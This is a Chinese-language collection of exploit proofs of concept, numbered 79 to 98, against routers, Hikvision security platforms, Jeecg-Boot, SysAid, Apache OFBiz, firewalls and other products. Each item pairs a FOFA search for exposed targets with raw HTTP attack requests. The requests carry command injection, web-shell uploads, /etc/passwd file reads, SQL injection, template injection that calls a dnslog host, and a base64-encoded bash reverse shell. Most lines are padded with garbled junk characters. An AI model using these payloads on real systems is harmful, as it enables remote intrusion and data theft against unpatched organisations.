! Q! z' O- w( }* P' ~: a d2 h: J* eGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
5 W* y& W6 \( Y' oHost: x.x.x.x
% \& ^' g& K5 H! _7 R5 C( i* F8 S7 N' ?9 }- _, m
- H E% Z) P' h6 \) j- k ?79. BYTEVALUE 百为流控路由器远程命令执行% f2 S+ ]3 d* P% L; l
FOFA:BYTEVALUE 智能流控路由器/ d* |# g+ `$ G$ @( f' x
GET /goform/webRead/open/?path=|id HTTP/1.17 ~' K$ }' B% V$ N8 A7 H. z7 s1 b
Host:IP
( z8 O4 K1 [+ t$ s. B+ GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
3 g" {9 @. i! X9 Z/ Q! cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! l* F* S4 _- A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 j+ @; \+ T2 b) VAccept-Encoding: gzip, deflate+ j3 t1 T# u) {: U( B: t |9 `
Connection: close
# Q P: r8 s+ Q! e8 q2 a6 ?Upgrade-Insecure-Requests: 1
# G+ B# `* i+ N5 ]/ A$ m5 i9 c6 }/ n
6 D8 ?* _' r" h80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
. I+ q2 N* G; p; _+ f* [5 l4 aFOFA:app="速达软件-公司产品"+ J% w, [0 p( H# j
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
1 ~7 j- Z4 I/ |0 t# B+ w1 Y: DHost: x.x.x.x2 R0 r/ S# B1 l$ L; f/ ?% R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 g2 a m2 q: n% d# A* U, X' [0 G4 oContent-Length: 27
+ C9 u; d" C+ A6 I ]! s1 R w" zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" c ~. s% a& \+ d5 M
Accept-Encoding: gzip, deflate0 l4 }8 e' H! ^' S4 l D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ V/ |) D, }, ?+ M, mConnection: close
' s5 p$ t: Q0 S. V5 }( @. HContent-Type: application/octet-stream4 j4 W$ D+ i3 w* j! P
Upgrade-Insecure-Requests: 14 v6 C, ~; ]: D1 d. f
4 A; }8 n L" l& z- |+ s* e<% out.print("oessqeonylzaf");%> y# Y) `5 v, h; f: v
3 V1 I' G2 _- _* c1 o% t; p9 w9 J6 D5 |1 k8 R
GET /xykqmfxpoas.jsp HTTP/1.1: x4 k' Z% a# S8 i- E. }. t4 y
Host: x.x.x.x
1 b6 X3 v% \9 d+ N& O! ~+ W% T, ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! f: [& e6 n3 s: Q9 I+ q
Connection: close. f, Z3 E5 k1 H6 t) e
Accept-Encoding: gzip. W4 c7 i4 i+ v6 u$ \5 _1 e: a
1 ~7 u0 N: J( o5 H
$ I- }! t; N1 N7 l! x% [7 k# K81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露" ]1 m" [: e5 G
FOFA:app="uniview-视频监控"
; {- m7 j* f1 ~6 n E0 i mGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
, S5 }; y- O" }( HHost: x.x.x.x5 D* Z/ f! C3 `9 v: k. }1 [" D& U6 Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% \) I5 ~2 y& c! C: Q) i5 uConnection: close" R" H2 V+ k5 E2 M& p
Accept-Encoding: gzip
: w) |2 A2 ]7 ^' i$ C4 A" ~! p6 e8 u; G* Y
2 P3 U j6 g. Z/ I. }) ^. b
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
4 v A3 ~/ }3 z5 E9 kFOFA:app="思福迪-LOGBASE"! M9 O- s# T2 D0 Q$ L) ?) `
POST /bhost/test_qrcode_b HTTP/1.1
- g- G1 h' w. K1 A. q' WHost: BaseURL
+ y d0 X, A. ?: }User-Agent: Go-http-client/1.1" J S8 L" `3 c: \2 B5 p" O6 q
Content-Length: 23
X7 h0 ~& @7 d- V1 c* MAccept-Encoding: gzip
5 N$ _4 g. ?2 y7 }Connection: close
! U h- K8 x7 h+ f2 {Content-Type: application/x-www-form-urlencoded5 O% S" R1 f7 e. G! u: T0 f! M
Referer: BaseURL
* I: v: X7 c2 z4 }
+ o% A& C# L+ @2 nz1=1&z2="|id;"&z3=bhost0 I6 Q' A7 K) }
0 L6 i, C% }$ r) K5 _% ?
8 V/ q, c, ]5 I8 y" E83. JeecgBoot testConnection 远程命令执行* g& E7 B, }* g, |: X1 {
FOFA:title=="JeecgBoot 企业级低代码平台"
. M) \. Y- K, g# i! o& Q2 \% F% Z+ X4 A/ `: Z
) X5 i1 s2 S4 |$ L
POST /jmreport/testConnection HTTP/1.1
^( n8 g8 @" ]3 R, C* BHost: x.x.x.x
: n1 j3 R' I1 ~8 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- j# f9 p5 n. _, u7 Q4 W
Connection: close! E# I( |1 K- A, R' c+ l' a( |& B
Content-Length: 8881
( J; C. v7 |7 k5 LAccept-Encoding: gzip
/ q5 r5 o. ]) p4 V, B7 \Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
0 s. w6 m% }/ a) v' DContent-Type: application/json
5 Y7 \ c" [: g- Z X( F
' Z" A% L: D( i L/ [/ ?4 WPAYLOAD$ V! w! l0 p5 I' v9 o4 h; X
7 F. U- m8 v& T7 q: A
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
! a: V8 Y. Z2 iFOFA:title=="JeecgBoot 企业级低代码平台"7 x3 \! {5 P- M: @8 P
3 |9 y# Z' \1 W7 `
. ]! j) d4 E' v( ^: ]/ U
0 k* ?- \5 b. C1 Z% z G
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1+ Z7 b% i- k$ D" j/ t1 E
Host: 192.168.40.130:8080
+ k1 A/ z9 d- kUser-Agent: curl/7.88.1
. i1 M- J8 v: A3 XContent-Length: 1562 C% c' w( Z$ P6 @2 b0 W" i D6 ~
Accept: */*
, y& c# u( z; P* ^2 @% p3 {Connection: close7 t m% t8 w/ W
Content-Type: application/json- N. m+ ^4 h c4 o. P
Accept-Encoding: gzip; p, v/ V4 C5 [. \- j
5 s+ g Y4 ]+ ]* _$ U' e3 w) n
{
# |) m. ^7 U' T' I* s "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}", Q7 J. x8 D9 }; J& w; z4 l
"type": "0"0 h5 j: V0 s' X S
}0 X7 R k) b( l* M5 N- ~
: [6 f) C u1 p8 L6 f% B
! g, U% A$ \) k5 D' F4 s# V0 M85. SysAid On-premise< 23.3.36远程代码执行
6 f; @5 ~) j4 k6 KCVE-2023-47246
2 {% k3 K' [) X Z7 U4 YFOFA:body="sysaid-logo-dark-green.png" ! z1 s T3 D b0 a% T
EXP数据包如下,注入哥斯拉马* i, W- k, E6 [
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
0 H/ ^0 j( c. s+ Z$ eHost: x.x.x.x k; X2 n8 w9 l3 x5 y. a: t$ ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; ~: s$ o% ]* q# V) S% c* [
Content-Type: application/octet-stream& f# m9 A5 @* H$ @ J! h- {1 }4 B1 [) B
Accept-Encoding: gzip
4 {0 l2 y: x' V7 _ K
! m% V8 V! _* w4 l. z2 ]PAYLOAD5 x0 U7 m3 ~* n v+ i2 [
8 k+ d7 |/ e) ~
回显URL:http://x.x.x.x/userfiles/index.jsp
1 u' A! b+ ~% l4 C' f( [, I
, ^% L, f+ t0 z8 c# E86. 日本tosei自助洗衣机RCE
, l' n* H$ B9 SFOFA:body="tosei_login_check.php"$ p1 v% t1 R) y
POST /cgi-bin/network_test.php HTTP/1.1
1 f4 V. {+ J% }$ w/ M! THost: x.x.x.x
6 n4 o* V, }" a/ F+ WUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
+ L' a% ~& X4 @* r$ CConnection: close
* s% B. w( S1 _1 T0 {- H9 v iContent-Length: 44
- E% Z2 z! K d! e6 \ `Accept: */*. j: e5 y" @6 \9 z
Accept-Encoding: gzip/ l& P$ `+ t8 n/ K- A
Accept-Language: en9 b: v% H* H1 w4 u
Content-Type: application/x-www-form-urlencoded: l# c* w. e t" g" K8 n
' u d. t- z( W8 F8 @host=%0acat${IFS}/etc/passwd%0a&command=ping+ {% J! Q9 [* U9 @2 |) E
/ c6 ~$ P% r5 h
4 b" b# C- H, n# l$ k6 z4 s2 h
87. 安恒明御安全网关aaa_local_web_preview文件上传
% C. E- t9 D$ U' u1 ?0 gFOFA:title="明御安全网关"
9 i9 s6 T! d! U O/ F9 R9 E" \4 BPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
1 L' D4 e6 V9 c) i# k c# XHost: X.X.X.X. t& r+ ?; ?; `# l% m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 z0 ?8 X& h& A* C5 J c, p
Connection: close
* {4 k1 _7 x3 vContent-Length: 198" A) u7 Z. H' Y0 v9 a9 @3 u
Accept-Encoding: gzip' c9 K0 w+ h8 |4 D4 _
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
2 s3 `1 K8 t/ n6 Q
# C1 W% v& Y' A9 _: ]5 B0 o A--qqobiandqgawlxodfiisporjwravxtvd0 o! T" n+ X5 E3 o# k/ ]
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
, D5 s; E5 n( v3 Q% @3 e& TContent-Type: text/plain
% ] i' q* Z; \
. j1 _/ E: e' h: C4 N- b9 Q& n4 B2ZqGNnsjzzU2GBBPyd8AIA7QlDq
, H0 o. Z6 y; r% y; F1 v' S--qqobiandqgawlxodfiisporjwravxtvd--" A) {5 @ T- H5 R4 H2 K
. p8 k# c1 H. r# {
: W* u2 ^" G; t- x$ B: t
/jfhatuwe.php
' A3 J1 d6 S) `5 p% v' d; K7 }; x: r% Y, h0 ~
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
' e D' @* K. A# Q3 y8 DFOFA:title="明御安全网关"% X# A" l% u9 e
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
, q: i: S! C: L, ^5 uHost: x.x.x.xx.x.x.x2 ]/ z3 ~* c6 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 h) }$ ^9 z- n% I4 u, }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 P" u, ]* o3 A w. `% \+ ^Accept-Encoding: gzip, deflate6 C- m9 L4 L+ w$ D5 P+ B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 y( G0 p4 D8 h9 M) x2 @- vConnection: close
( w/ k* J O) D7 O" M; g) c; N
+ S# p7 r8 R. Q9 g4 S" H2 Q, z* ?! z/ g& m
# V v4 K; R5 F$ X/astdfkhl.php1 y) N5 f6 u( f# S' |
9 j1 u" ]# f7 y; t4 h4 J2 F6 d
89. 致远互联FE协作办公平台editflow_manager存在sql注入5 c& |$ O% }0 b6 H+ S
FOFA:title="FE协作办公平台" || body="li_plugins_download"
+ t" s$ P( G* H+ EPOST /sysform/003/editflow_manager.js%70 HTTP/1.15 [* a8 h1 [. W! B8 l* S6 h, y! e1 ]
Host: x.x.x.x3 q' H$ e3 a! _6 Q1 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 I2 B* k {% x' z- e1 H7 r
Connection: close
3 c- a* _2 ]1 I+ v* gContent-Length: 41
4 a" z' r" r; o0 \Content-Type: application/x-www-form-urlencoded
3 y; `1 l' l2 b( }% z' V5 k- n0 [Accept-Encoding: gzip
6 Z0 q- x' D2 T5 `" o+ X0 _
: E5 i' u7 m- w, \* `; C5 m- f2 u1 Goption=2&GUID=-1'+union+select+111*222--+* @8 O3 F7 ]8 n( i* b0 U8 R. l
5 V/ ^1 r7 _/ O" F7 C& G c# d2 w# ?1 n* b! S0 m
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行! p1 H, S8 h# t3 c% t& b
FOFA:icon_hash="-1830859634"0 z& B2 q9 g( L' ~# E+ `
POST /php/ping.php HTTP/1.1! S7 y% d* r5 [$ }: i9 T" W- v, ]( u
Host: x.x.x.x
% U4 e& B& c' J0 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
# G9 D4 @% M. h- ^! O' jContent-Length: 51
, ^. S& Y& r& i1 h" CAccept: application/json, text/javascript, */*; q=0.01
7 E7 S v) m Q3 _9 DAccept-Encoding: gzip, deflate
% [9 P/ T7 o# LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 I/ \, h* [9 @! e9 v* C
Connection: close
( E& y9 p4 A/ _9 B+ BContent-Type: application/x-www-form-urlencoded
4 z4 X- h) q% ^; bX-Requested-With: XMLHttpRequest
* S' Y! D$ f- X' ~" Y
# B% g1 Z, J. w* {( ~jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
3 x f* q8 ~ m& P* ^2 s
0 i6 p0 w3 B' u* Q$ r* L" h& V5 \; j# K/ M
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
4 `/ E5 X+ {: J3 z$ ?# ]; T( {, \FOFA:title="综合安防管理平台"# u/ v. ^! V( q4 g; i
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.10 V+ @7 H: J/ I) [5 ~. h* r& E. B
Host: your-ip
7 ^* x5 I% f+ t' d1 O" AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
) Q8 I( n0 I# c) z( u5 b" B+ u- nAccept-Encoding: gzip, deflate
+ E9 W& s0 N) E+ P5 k% u6 y# ^& tAccept: */*
2 O* h* r( }" m5 T) o. {Connection: keep-alive
4 M' N8 p l: q6 T7 V, ?* x i4 @" W" _
{; C% l6 W- Z u! S5 o: u9 s! F o5 x7 J- B/ K
92. 海康威视运行管理中心session命令执行) ~ r. d2 W1 [7 s1 C
Fastjson命令执行
% \1 ?- c# s1 v8 {9 X: H9 z/ y! [hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"0 |# {6 \. E2 h, r7 u" b
POST /center/api/session HTTP/1.1/ }9 v- I$ _* T+ E: H
Host:4 @8 a" O/ }. F" C1 F' M/ i4 ?
Accept: application/json, text/plain, */*
8 _4 y" V; D% F% Q1 a7 k9 `! ZAccept-Encoding: gzip, deflate
# M& d* G; P) N2 D* {. mX-Requested-With: XMLHttpRequest5 C. `) R v4 d2 D
Content-Type: application/json;charset=UTF-8) _! z4 i3 v9 d, p+ e
X-Language-Type: zh_CN8 @5 }1 r3 f$ D6 ^/ w
Testcmd: echo test+ m; K& K5 r9 v* g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36, S+ b7 i8 ?0 ~0 Q* ^
Accept-Language: zh-CN,zh;q=0.9
7 t- z( W2 j; W7 A% ZContent-Length: 57786 b a7 Z0 k; t; w1 t8 X* E
0 p( a3 Z- i7 \9 B
PAYLOAD
1 r+ X! X$ [* n" C9 p: ~6 c1 n% u- n: ?3 Z0 H
% k, b+ o/ ?$ s4 Y& h% p% H+ t0 G93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
8 D# f* m& ^& {6 `* l0 CFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
( P5 R E% u7 z: z0 qPOST /?g=app_av_import_save HTTP/1.1
) B! f( G, s9 k1 zHost: x.x.x.x5 X* }8 F' j5 u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
& N1 L5 F1 p: A8 dUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 h" B( p% x& e9 c- I0 G6 }: O9 U. }# u3 h7 c, D6 ?- v, U
------WebKitFormBoundarykcbkgdfx# t7 ^5 E' L' |
Content-Disposition: form-data; name="MAX_FILE_SIZE") u2 G; `) Y- g5 g. ^ ~$ U' B
6 h, c m4 \; f- J% N+ W, }10000000; u2 m/ Q4 h5 N6 ]6 T8 a1 P- K9 C& v
------WebKitFormBoundarykcbkgdfx+ J8 ]: Q6 w# @/ s4 r
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
% _, o4 }! k6 Z2 A: W5 BContent-Type: text/plain
) b- [3 _8 D% G* G+ l, ^1 q# F) d: J! Y4 m6 E9 s
wagletqrkwrddkthtulxsqrphulnknxa
* t' u8 j) a4 }3 n9 [------WebKitFormBoundarykcbkgdfx
8 B) O: Z9 W4 B0 E# t: `: {; lContent-Disposition: form-data; name="submit_post"; I( M$ v3 \5 S( b+ V2 P) } B
" P+ B% ?# i+ L$ W B. f# Cobj_app_upfile' }! u5 t5 B5 g' f
------WebKitFormBoundarykcbkgdfx! [% G" T4 l3 p; |
Content-Disposition: form-data; name="__hash__"
5 \8 s; y- q7 b+ |% O7 y" i. A3 x
; _9 N& \( ], C6 M" g0b9d6b1ab7479ab69d9f71b05e0e94453 y; n1 q! O' J2 Y6 g' m; m
------WebKitFormBoundarykcbkgdfx--3 L& u7 Y- i" N, t: _
4 L: v4 q7 v+ S0 m* O/ E+ r( L
% D7 S- B" C+ z3 }GET /attachements/xlskxknxa.txt HTTP/1.1
" E5 \! V, z& ?* u8 f6 C xHost: xx.xx.xx.xx# {0 Y) o; H- P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 l! ]& q7 O8 j# X
: {" x+ K) E3 X8 {$ H$ d
: G, O* b' c7 T, K94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
5 W& U) ^) }' D; u. VFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
K$ O# o2 h4 L8 A$ R [POST /?g=obj_area_import_save HTTP/1.1
* q" l& ]) p" u' zHost: x.x.x.x. E7 c* o) C4 Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt! `% W* k y0 n" [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.366 f/ |* o" @5 y! X7 {" T
& B& c+ g7 m2 D2 D5 c4 g( @
------WebKitFormBoundarybqvzqvmt8 \4 d2 U, e' [! n) Y( l: u5 ]3 a
Content-Disposition: form-data; name="MAX_FILE_SIZE"
9 Q. ]0 M' a0 r6 o; [3 d* [8 v2 K1 {" w# }
10000000
~ H$ n: r# O# X! c" F------WebKitFormBoundarybqvzqvmt
$ S0 I$ H2 k a1 D8 |7 B( kContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"3 Z1 g+ B9 I, _' Y
Content-Type: text/plain
9 d( h4 R5 q# r* w" @; Z) E- ^! P" b7 J! R) ~: e5 E- n. ]2 A; b, Z1 k2 {
pxplitttsrjnyoafavcajwkvhxindhmu" i+ H, L( ^/ B' N; t
------WebKitFormBoundarybqvzqvmt" }: H. C$ L* |/ i8 _+ s
Content-Disposition: form-data; name="submit_post"
8 A% h& y; \$ G4 J
6 _( E1 T# m6 S2 s' K- Xobj_app_upfile. g% r ^* L8 b0 m" [8 q
------WebKitFormBoundarybqvzqvmt
! t9 {$ X" h' m: f7 }9 pContent-Disposition: form-data; name="__hash__"
( D. T" d3 C* [% B5 w2 q0 ^/ q. R' T, E% X. W) A
0b9d6b1ab7479ab69d9f71b05e0e94453 P# ^9 {& p! x7 F' x
------WebKitFormBoundarybqvzqvmt--4 L! a6 f! P/ m n6 ]
' ~( O2 V$ v# L9 J( f6 B6 k6 K
9 ~$ `8 J8 V* ^% E% P2 C# d8 T- `5 H, T5 Z0 F3 ^- E7 C9 L2 P
GET /attachements/xlskxknxa.txt HTTP/1.10 M6 j, g3 G; a
Host: xx.xx.xx.xx
# m, ^. Q) c( lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' k) A# n( W6 q, q* ?& f& K% U
/ ~: k. v; ?, r) Y# ]( A8 t+ [1 Q
2 a/ k+ k& r- _ C2 h |: z& p% a/ U6 V# A8 F% p& k3 v4 s
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
* s K+ p2 y/ K& `; T2 d5 ]+ @6 ~CVE-2023-49070
! g: `* R5 y6 a, P% K* w7 I8 gFOFA:app="Apache_OFBiz"0 r3 x0 B, _; ^! W0 r& t
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
" e4 \9 @9 [( {( C. Y5 C- E% gHost: x.x.x.x
& i8 q8 B. r; a( T2 x/ c5 D% Y6 ?4 zUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36; z3 o5 d' m8 x% C4 t& s, P8 R9 ?
Connection: close# ~. ~, H% ~6 z' Q5 h& Q) G
Content-Length: 889
8 j3 i# S/ F' Y4 Z4 y* E Q: TContent-Type: application/xml9 b9 z5 o0 R* c" Y
Accept-Encoding: gzip& P" S" o T& F+ ~+ r' e& j
8 y9 A, ~ l! A0 E
<?xml version="1.0"?>
7 }! F- }5 H/ B8 y7 s<methodCall>
/ Z' w! u9 n3 `/ i( Q* s0 W <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
# U o. ~ U$ X$ x* ] <params>! }: L+ x- ^ r( H
<param>1 w8 t4 M1 G3 G# |+ s! e5 j$ L3 [
<value>
% y9 T* o$ o2 y0 {. w; }; s <struct>
/ W: T) ]8 e! P9 u( c y( J* Y <member>
; q! G" y a& H0 i9 h8 v <name>test</name>
: f7 {5 [4 L6 ^. K <value>3 s0 Z5 N, ]; U
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>! c5 H/ j: A u9 U6 Q: Z8 x; y5 k
</value>
0 @: J& d/ T- J </member>6 w K0 _/ N' [/ @4 r9 _% R
</struct> j& K, Z# o) x+ H" y- d/ G5 P
</value>
( \" }5 k% y; f" \ </param>
& z+ ?7 N8 h8 ^0 m </params>4 E. a) ]$ m! x' i$ n/ R
</methodCall>5 T, q) k7 y0 |
8 F8 J4 o$ g9 J+ e3 I. F
- T1 M6 R: A0 T; g' ] Y# l
用ysoserial生成payload
% _( }* m% v, K( I" @" cjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
3 U9 K. e* s: W! s* c7 D6 A: C8 r# `& l$ R8 h
- T( ?9 o5 p$ ] j- A* C
将生成的payload替换到上面的POC/ f2 N) `, ~) i) r+ V4 y( x, u
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
, i+ I" |7 m4 ]- S$ p- ?Host: 192.168.40.130:84437 @; y o8 y5 ~" v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" u3 Z2 L# |3 x
Connection: close/ P/ T% }+ r2 I& i$ O6 X
Content-Length: 889$ [3 R7 o. I/ Z: X8 e _1 h
Content-Type: application/xml4 G( U% O0 z0 k% S9 e `
Accept-Encoding: gzip
, N0 o$ ? X3 U5 _+ U D; _1 `8 C
PAYLOAD
! i' R, ~* K+ G7 C
) H* B. b) q: z8 i& h& U. b96. Apache OFBiz 18.12.11 groovy 远程代码执行
7 \& z) n# Y$ T3 QFOFA:app="Apache_OFBiz"
2 W+ A; }% V. N& W3 |+ C& ?! qPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1( m3 [, v1 o3 K, V/ q+ v: Q
Host: localhost:8443) S# t% a+ s0 v" H& m9 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ u* ^7 P1 A: {7 aAccept: */*) q9 I8 }! F/ H! U$ ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( \3 i Q6 z' x$ W3 j5 k- W+ X" k
Content-Type: application/x-www-form-urlencoded2 _+ z1 l) A1 z1 c( e
Content-Length: 55" D) \ ^ `& n# C
1 d8 y8 F5 _( }* {8 c9 m) J
groovyProgram=throw+new+Exception('id'.execute().text);2 |6 |: @# z% M- g- m, G
" _& _- }8 ~0 k0 Y/ \- a( n2 R6 n( ?. I5 H1 v$ o9 C8 v
反弹shell$ a( {; v* N1 P, k$ P
在kali上启动一个监听. l! u7 ~! M# z" o- R, z$ ]
nc -lvp 7777
; w; D( n A- B% |7 Y
8 o# P% |% y! H. d- k& {: dPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; J' ^, I N' c
Host: 192.168.40.130:8443
) ^3 m5 X. i' k6 @6 y$ oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 V1 @' E7 ]! U, c$ JAccept: */*) v4 P) [4 T7 g; Z5 M) T1 a5 w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ S$ O P- d4 x- A* h @8 yContent-Type: application/x-www-form-urlencoded
, y$ r( C2 L# q4 C, F& r' K5 u, y% @Content-Length: 71
. N8 Y. `; Q2 m. o6 ~4 _4 D
% m3 `* q( s/ w4 r7 I& RgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();% ]7 t+ U! Z: l6 `. y* b, Z
4 n, ]; j6 l( O: d
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
" I% q; i( [% Z; j8 @$ q" D& H: dFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"8 n8 @& n- { ]- P' V
GET /passport/login/ HTTP/1.1
E( P( _; @( m9 p! B" n' jHost: 192.168.40.130:8085
# F/ J% {( W0 ?# bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- c5 x4 n1 S' @. V! v
Accept-Encoding: gzip: b U* E4 A2 c& }5 a
Connection: close4 p' F" b/ {8 i0 D
Cookie: rememberMe=PAYLOAD3 D: j/ @* Z" m+ L" `8 b) u
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"- l5 v2 w) m6 R$ l
8 t( l, f; N U3 i4 ]
4 h& W" c7 ^& U* \) S8 G% s9 c98. SpiderFlow爬虫平台远程命令执行" F3 ]6 n, Z; s* v
CVE-2024-0195
/ a/ @" L( T! v. `FOFA:app="SpiderFlow"
: F& ]" q. C. \% M1 L, APOST /function/save HTTP/1.1
4 H+ j5 ~ _- e; g0 g- zHost: 192.168.40.130:8088
3 ~; o7 y# z& g6 W: mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- c# r6 c8 [. z- n) P
Connection: close4 x+ e# L1 y; x U1 ^" z, y
Content-Length: 121
$ I0 l1 [' |& ]9 D* j4 NAccept: */*
& k/ Q! m* m) n3 MAccept-Encoding: gzip, deflate5 U2 d) g! p: Y4 i1 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
